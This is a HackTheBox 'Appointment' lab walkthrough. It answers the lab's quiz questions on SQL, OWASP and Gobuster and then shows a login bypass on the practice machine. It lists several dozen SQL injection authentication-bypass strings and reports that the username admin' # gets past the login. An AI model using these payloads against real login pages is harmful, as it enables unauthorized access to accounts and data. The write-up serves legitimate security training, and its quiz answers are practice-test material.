Appointment Walkthrough | HackTheBox
This is a simple walkthrough for completing the appointment target machine in Hackthebox.com.
Task 1
Question: What does the acronym SQL stand for?
Answer: Structured Query Language

Task 2
Question: What is one of the most common type of SQL vulnerabilities?
Answer: SQL injection

Task 3
Question: What does PII stand for?
Answer: Personally Identifiable Information

Task 4
Question: What does the OWASP Top 10 list name the classification for this vulnerability?
Answer: A03:2021-Injection

Task 5
Question: What service and version are running on port 80 of the target?
Answer: Apache httpd 2.4.38 ((Debian))

Task 6
Question: What is the standard port used for the HTTPS protocol?
Answer: 443

Task 7
Question: What is one luck-based method of exploiting login pages?
Answer: Brute-forcing

Task 8
Question: What is a folder called in web-application terminology?
Answer: directory

Task 9
Question: What response code is given for “Not Found” errors?
Answer: 404

Task 10
Question: What switch do we use with Gobuster to specify we’re looking to discover directories, and not subdomains?
Answer: dir

Task 8
Question: What symbol do we use to comment out parts of the code?
Answer: #

Task 9
Submit Flag
If we navigate to the domain address, we will be prompted with a login page.

We can do a quick Google search for SQL admin login strings. This search will give us many admin login strings we can try to login with in search for a sql injection vulnerability.
SQL Injection Authentication Bypass Strings
or 1=1
or 1=1–
or 1=1#
or 1=1/*
admin’ —
admin’ #
admin’/*
admin’ or ‘1’=’1
admin’ or ‘1’=’1′–
admin’ or ‘1’=’1’#
admin’ or ‘1’=’1’/*
admin’or 1=1 or ”=’
admin’ or 1=1
admin’ or 1=1–
admin’ or 1=1#
admin’ or 1=1/*
admin’) or (‘1’=’1
admin’) or (‘1’=’1’–
admin’) or (‘1’=’1’#
admin’) or (‘1’=’1’/*
admin’) or ‘1’=’1
admin’) or ‘1’=’1′–
admin’) or ‘1’=’1’#
admin’) or ‘1’=’1’/*
admin” —
admin” #
admin”/*
admin” or “1”=”1
admin” or “1”=”1″–
admin” or “1”=”1″#
admin” or “1”=”1″/*
admin”or 1=1 or “”=”
admin” or 1=1
admin” or 1=1–
admin” or 1=1#
admin” or 1=1/*
admin”) or (“1″=”1
admin”) or (“1″=”1”–
admin”) or (“1″=”1″#
admin”) or (“1″=”1″/*
admin”) or “1”=”1
admin”) or “1”=”1″–
admin”) or “1”=”1″#
admin”) or “1”=”1″/*
If we set the username and password as admin’ # it will allow us to login to the web application.

Mission accomplished.